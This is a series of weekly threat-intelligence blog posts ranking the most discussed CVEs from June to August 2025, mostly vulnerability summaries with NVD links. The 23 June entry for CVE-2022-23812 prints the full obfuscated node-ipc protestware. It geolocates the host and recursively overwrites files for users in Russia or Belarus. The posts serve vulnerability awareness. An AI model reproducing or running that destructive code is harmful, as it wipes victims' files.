The SOS Intelligence CVE Chatter Weekly Top Ten – 18 August 2025

by Amir Hadzipasic

August 18, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2025-8088

A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček
from ESET.

https://nvd.nist.gov/vuln/detail/CVE-2025-8088

2. CVE-2024-38476

Vulnerability in core of Apache HTTP Server 2.4.59 and earlier are vulnerably to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable.

Users are recommended to upgrade to version 2.4.60, which fixes this issue.

https://nvd.nist.gov/vuln/detail/CVE-2024-38476

3. CVE-2025-21204

Improper link resolution before file access (‘link following’) in Windows Update Stack allows an authorized attacker to elevate privileges locally.

https://nvd.nist.gov/vuln/detail/CVE-2025-21204

4. CVE-2024-21762

A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

5. CVE-2024-21060

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Data Dictionary). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

6. CVE-2021-40539

Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.

https://nvd.nist.gov/vuln/detail/CVE-2021-40539

7. CVE-2024-10687

The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to time-based SQL Injection via the $collectedIds parameter in all versions up to, and including, 24.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

8. CVE-2017-8759

Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka “.NET Framework Remote Code Execution Vulnerability.”

https://nvd.nist.gov/vuln/detail/CVE-2017-8759

9. CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a ” (backslash double quote) in a crafted Sender property.

https://nvd.nist.gov/vuln/detail/CVE-2016-10033

10. CVE-2025-32433

Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.

https://nvd.nist.gov/vuln/detail/CVE-2025-32433

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 11 August 2025

by Amir Hadzipasic

August 11, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2025-21204

Improper link resolution before file access (‘link following’) in Windows Update Stack allows an authorized attacker to elevate privileges locally.

https://nvd.nist.gov/vuln/detail/CVE-2025-21204

2. CVE-2024-38476

Users are recommended to upgrade to version 2.4.60, which fixes this issue.

https://nvd.nist.gov/vuln/detail/CVE-2024-38476

3. CVE-2024-21762

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

4. CVE-2017-8759

https://nvd.nist.gov/vuln/detail/CVE-2017-8759

5. CVE-2024-21060

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

6. CVE-2021-40539

Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.

https://nvd.nist.gov/vuln/detail/CVE-2021-40539

7. CVE-2016-10033

https://nvd.nist.gov/vuln/detail/CVE-2016-10033

8. CVE-2024-10687

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

9. CVE-2025-21298

Windows OLE Remote Code Execution Vulnerability

https://nvd.nist.gov/vuln/detail/CVE-2025-21298

10. CVE-2024-6409

A race condition vulnerability was discovered in how signals are handled by OpenSSH’s server (sshd). If a remote attacker does not authenticate within a set time period, then sshd’s SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.

https://nvd.nist.gov/vuln/detail/CVE-2024-6409

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 04 August 2025

by Amir Hadzipasic

August 4, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2025-21298

Windows OLE Remote Code Execution Vulnerability

https://nvd.nist.gov/vuln/detail/CVE-2025-21298

2. CVE-2025-53770

Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network.
Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild.
Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.

https://nvd.nist.gov/vuln/detail/CVE-2025-53770

3. CVE-2025-5287

The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘post’ parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2025-5287

4. CVE-2025-49704

Improper control of generation of code (‘code injection’) in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-49704

5. CVE-2024-23660

The Binance Trust Wallet app for iOS in commit 3cd6e8f647fbba8b5d8844fcd144365a086b629f, git tag 0.0.4 misuses the trezor-crypto library and consequently generates mnemonic words for which the device time is the only entropy source, leading to economic losses, as exploited in the wild in July 2023. An attacker can systematically generate mnemonics for each timestamp within an applicable timeframe, and link them to specific wallet addresses in order to steal funds from those wallets.

https://nvd.nist.gov/vuln/detail/CVE-2024-23660

6. CVE-2025-49706

Improper authentication in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-49706

7. CVE-2025-53771

Improper authentication in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-53771

8. CVE-2024-38476

Users are recommended to upgrade to version 2.4.60, which fixes this issue.

https://nvd.nist.gov/vuln/detail/CVE-2024-38476

9. CVE-2025-20337

A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability.

This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device.

https://nvd.nist.gov/vuln/detail/CVE-2025-20337

10. CVE-2025-6554

Type confusion in V8 in Google Chrome prior to 138.0.7204.96 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-6554

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 28 July 2025

by Amir Hadzipasic

July 28, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2017-5689

An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT).

https://nvd.nist.gov/vuln/detail/CVE-2017-5689

2. CVE-2025-53770

https://nvd.nist.gov/vuln/detail/CVE-2025-53770

3. CVE-2025-49706

Improper authentication in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-49706

4. CVE-2025-49704

Improper control of generation of code (‘code injection’) in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-49704

5. CVE-2025-47165

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://nvd.nist.gov/vuln/detail/CVE-2025-47165

6. CVE-2025-27817

A possible arbitrary file read and SSRF vulnerability has been identified in Apache Kafka Client. Apache Kafka Clients accept configuration data for setting the SASL/OAUTHBEARER connection with the brokers, including “sasl.oauthbearer.token.endpoint.url” and “sasl.oauthbearer.jwks.endpoint.url”. Apache Kafka allows clients to read an arbitrary file and return the content in the error log, or sending requests to an unintended location. In applications where Apache Kafka Clients configurations can be specified by an untrusted party, attackers may use the “sasl.oauthbearer.token.endpoint.url” and “sasl.oauthbearer.jwks.endpoint.url” configuratin to read arbitrary contents of the disk and environment variables or make requests to an unintended location. In particular, this flaw may be used in Apache Kafka Connect to escalate from REST API access to filesystem/environment/URL access, which may be undesirable in certain environments, including SaaS products.

Since Apache Kafka 3.9.1/4.0.0, we have added a system property (“-Dorg.apache.kafka.sasl.oauthbearer.allowed.urls”) to set the allowed urls in SASL JAAS configuration. In 3.9.1, it accepts all urls by default for backward compatibility. However in 4.0.0 and newer, the default value is empty list and users have to set the allowed urls explicitly.

https://nvd.nist.gov/vuln/detail/CVE-2025-27817

7. CVE-2025-6554

Type confusion in V8 in Google Chrome prior to 138.0.7204.96 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-6554

8. CVE-2025-48799

Improper link resolution before file access (‘link following’) in Windows Update Service allows an authorized attacker to elevate privileges locally.

https://nvd.nist.gov/vuln/detail/CVE-2025-48799

9. CVE-2025-53771

Improper limitation of a pathname to a restricted directory (‘path traversal’) in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-53771

10. CVE-2024-6409

https://nvd.nist.gov/vuln/detail/CVE-2024-6409

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 21 July 2025

by Amir Hadzipasic

July 21, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2021-40539

Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.

https://nvd.nist.gov/vuln/detail/CVE-2021-40539

2. CVE-2025-6554

Type confusion in V8 in Google Chrome prior to 138.0.7204.96 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-6554

3. CVE-2021-44228

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

4. CVE-2025-5287

https://nvd.nist.gov/vuln/detail/CVE-2025-5287

5. CVE-2024-21762

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

6. CVE-2024-21060

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

7. CVE-2017-8759

https://nvd.nist.gov/vuln/detail/CVE-2017-8759

8. CVE-2016-10033

https://nvd.nist.gov/vuln/detail/CVE-2016-10033

9. CVE-2024-10687

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

10. CVE-2016-1252

The apt package in Debian jessie before 1.0.9.8.4, in Debian unstable before 1.4~beta2, in Ubuntu 14.04 LTS before 1.0.1ubuntu2.17, in Ubuntu 16.04 LTS before 1.2.15ubuntu0.2, and in Ubuntu 16.10 before 1.3.2ubuntu0.1 allows man-in-the-middle attackers to bypass a repository-signing protection mechanism by leveraging improper error handling when validating InRelease file signatures.

https://nvd.nist.gov/vuln/detail/CVE-2016-1252

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 14 July 2025

by Amir Hadzipasic

July 14, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2025-5287

https://nvd.nist.gov/vuln/detail/CVE-2025-5287

2. CVE-2025-24813

Path Equivalence: ‘file.Name’ (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.

This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.

If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files:
– writes enabled for the default servlet (disabled by default)
– support for partial PUT (enabled by default)
– a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads
– attacker knowledge of the names of security sensitive files being uploaded
– the security sensitive files also being uploaded via partial PUT

If all of the following were true, a malicious user was able to perform remote code execution:
– writes enabled for the default servlet (disabled by default)
– support for partial PUT (enabled by default)
– application was using Tomcat’s file based session persistence with the default storage location
– application included a library that may be leveraged in a deserialization attack

Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.

https://nvd.nist.gov/vuln/detail/CVE-2025-24813

3. CVE-2021-40539

Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.

https://nvd.nist.gov/vuln/detail/CVE-2021-40539

4. CVE-2022-3602

A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution. Many platforms implement stack overflow protections which would mitigate against the risk of remote code execution. The risk may be further mitigated based on stack layout for any given platform/compiler. Pre-announcements of CVE-2022-3602 described this issue as CRITICAL. Further analysis based on some of the mitigating factors described above have led this to be downgraded to HIGH. Users are still encouraged to upgrade to a new version as soon as possible. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. Fixed in OpenSSL 3.0.7 (Affected 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6).

https://nvd.nist.gov/vuln/detail/CVE-2022-3602

5. CVE-2024-24919

Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.

https://nvd.nist.gov/vuln/detail/CVE-2024-24919

6. CVE-2025-5777

Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server

https://nvd.nist.gov/vuln/detail/CVE-2025-5777

7. CVE-2022-3786

https://nvd.nist.gov/vuln/detail/CVE-2022-3786

8. CVE-2025-6554

Type confusion in V8 in Google Chrome prior to 138.0.7204.96 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-6554

9. CVE-2025-33073

Improper access control in Windows SMB allows an authorized attacker to elevate privileges over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-33073

10. CVE-2025-6430

When a file download is specified via the `Content-Disposition` header, that directive would be ignored if the file was included via a `<embed>` or `<object>` tag, potentially making a website vulnerable to a cross-site scripting attack. This vulnerability affects Firefox < 140 and Firefox ESR < 128.12.

https://nvd.nist.gov/vuln/detail/CVE-2025-6430

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 07 July 2025

by Amir Hadzipasic

July 7, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2025-5839

A vulnerability, which was classified as critical, has been found in Tenda AC9 15.03.02.13. Affected by this issue is the function fromadvsetlanip of the file /goform/AdvSetLanip of the component POST Request Handler. The manipulation of the argument lanMask leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

https://nvd.nist.gov/vuln/detail/CVE-2025-5839

2. CVE-2025-6554

Type confusion in V8 in Google Chrome prior to 138.0.7204.96 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-6554

3. CVE-2025-32463

Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the –chroot option.

https://nvd.nist.gov/vuln/detail/CVE-2025-32463

4. CVE-2025-32462

Sudo before 1.9.17p1, when used with a sudoers file that specifies a host that is neither the current host nor ALL, allows listed users to execute commands on unintended machines.

https://nvd.nist.gov/vuln/detail/CVE-2025-32462

5. CVE-2023-26075

An issue was discovered in Samsung Mobile Chipset and Baseband Modem Chipset for Exynos 850, Exynos 980, Exynos 1080, Exynos 1280, Exynos 2200, Exynos Modem 5123, Exynos Modem 5300, and Exynos Auto T5123. An intra-object overflow in the 5G MM message codec can occur due to insufficient parameter validation when decoding the Service Area List.

https://nvd.nist.gov/vuln/detail/CVE-2023-26075

6. CVE-2017-5638

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

https://nvd.nist.gov/vuln/detail/CVE-2017-5638

7. CVE-2025-43200

This issue was addressed with improved checks. This issue is fixed in watchOS 11.3.1, macOS Ventura 13.7.4, iOS 15.8.4 and iPadOS 15.8.4, iOS 16.7.11 and iPadOS 16.7.11, iPadOS 17.7.5, visionOS 2.3.1, macOS Sequoia 15.3.1, iOS 18.3.1 and iPadOS 18.3.1, macOS Sonoma 14.7.4. A logic issue existed when processing a maliciously crafted photo or video shared via an iCloud Link. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals.

https://nvd.nist.gov/vuln/detail/CVE-2025-43200

8. CVE-2024-38063

Windows TCP/IP Remote Code Execution Vulnerability

https://nvd.nist.gov/vuln/detail/CVE-2024-38063

9. CVE-2023-26074

An issue was discovered in Samsung Mobile Chipset and Baseband Modem Chipset for Exynos 850, Exynos 980, Exynos 1080, Exynos 1280, Exynos 2200, Exynos Modem 5123, Exynos Modem 5300, and Exynos Auto T5123.. A heap-based buffer overflow in the 5G MM message codec can occur due to insufficient parameter validation when decoding operator-defined access category definitions.

https://nvd.nist.gov/vuln/detail/CVE-2023-26074

10. CVE-2024-4990

In yiisoft/yii2 version 2.0.48, the base Component class contains a vulnerability where the `__set()` magic method does not validate that the value passed is a valid Behavior class name or configuration. This allows an attacker to instantiate arbitrary classes, passing parameters to their constructors and invoking setter methods. Depending on the installed dependencies, various types of attacks are possible, including the execution of arbitrary code, retrieval of sensitive information, and unauthorized access.

https://nvd.nist.gov/vuln/detail/CVE-2024-4990

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 30 June 2025

by Amir Hadzipasic

June 30, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2024-4990

https://nvd.nist.gov/vuln/detail/CVE-2024-4990

2. CVE-2024-58136

Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025.

https://nvd.nist.gov/vuln/detail/CVE-2024-58136

3. CVE-2025-5839

https://nvd.nist.gov/vuln/detail/CVE-2025-5839

4. CVE-2018-6981

VMware ESXi 6.7 without ESXi670-201811401-BG and VMware ESXi 6.5 without ESXi650-201811301-BG, VMware ESXi 6.0 without ESXi600-201811401-BG, VMware Workstation 15, VMware Workstation 14.1.3 or below, VMware Fusion 11, VMware Fusion 10.1.3 or below contain uninitialized stack memory usage in the vmxnet3 virtual network adapter which may allow a guest to execute code on the host.

https://nvd.nist.gov/vuln/detail/CVE-2018-6981

5. CVE-2025-32432

Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector. This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.

https://nvd.nist.gov/vuln/detail/CVE-2025-32432

6. CVE-2025-33053

External control of file name or path in Internet Shortcut Files allows an unauthorized attacker to execute code over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-33053

7. CVE-2024-21762

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

8. CVE-2025-49144

Notepad++ is a free and open-source source code editor. In versions 8.8.1 and prior, a privilege escalation vulnerability exists in the Notepad++ v8.8.1 installer that allows unprivileged users to gain SYSTEM-level privileges through insecure executable search paths. An attacker could use social engineering or clickjacking to trick users into downloading both the legitimate installer and a malicious executable to the same directory (typically Downloads folder – which is known as Vulnerable directory). Upon running the installer, the attack executes automatically with SYSTEM privileges. This issue has been fixed and will be released in version 8.8.2.

https://nvd.nist.gov/vuln/detail/CVE-2025-49144

9. CVE-2024-20720

Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) vulnerability that could lead in arbitrary code execution by an attacker. Exploitation of this issue does not require user interaction.

https://nvd.nist.gov/vuln/detail/CVE-2024-20720

10. CVE-2024-38476

Users are recommended to upgrade to version 2.4.60, which fixes this issue.

https://nvd.nist.gov/vuln/detail/CVE-2024-38476

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 23 June 2025

by Amir Hadzipasic

June 23, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2016-10033

https://nvd.nist.gov/vuln/detail/CVE-2016-10033

2. CVE-2025-33053

External control of file name or path in Internet Shortcut Files allows an unauthorized attacker to execute code over a network.

https://nvd.nist.gov/vuln/detail/CVE-2025-33053

3. CVE-2023-0386

A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.

https://nvd.nist.gov/vuln/detail/CVE-2023-0386

4. CVE-2024-21762

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

5. CVE-2025-43200

https://nvd.nist.gov/vuln/detail/CVE-2025-43200

6. CVE-2024-10687

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

7. CVE-2024-21060

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

8. CVE-2017-8759

https://nvd.nist.gov/vuln/detail/CVE-2017-8759

9. CVE-2025-2783

Incorrect handle provided in unspecified circumstances in Mojo in Google Chrome on Windows prior to 134.0.6998.177 allowed a remote attacker to perform a sandbox escape via a malicious file. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-2783

10. CVE-2022-23812

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don’t run it! js import u from “path”; import a from “fs”; import o from “https”; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from(“aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=”, “base64”); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(“utf8”), function (t) { t.on(“data”, function (t) { const n = Buffer.from(“Li8=”, “base64”); const o = Buffer.from(“Li4v”, “base64”); const r = Buffer.from(“Li4vLi4v”, “base64”); const f = Buffer.from(“Lw==”, “base64”); const c = Buffer.from(“Y291bnRyeV9uYW1l”, “base64”); const e = Buffer.from(“cnVzc2lh”, “base64”); const i = Buffer.from(“YmVsYXJ1cw==”, “base64”); try { const s = JSON.parse(t.toString(“utf8”)); const u = s[c.toString(“utf8”)].toLowerCase(); const a = u.includes(e.toString(“utf8”)) || u.includes(i.toString(“utf8”)); // checks if country is Russia or Belarus if (a) { h(n.toString(“utf8”)); h(o.toString(“utf8”)); h(r.toString(“utf8”)); h(f.toString(“utf8”)); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = “”, o = “”) { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(“4p2k77iP”, “base64”); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(…s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(“utf8”), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

https://nvd.nist.gov/vuln/detail/CVE-2022-23812

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 16 June 2025

by Amir Hadzipasic

June 16, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

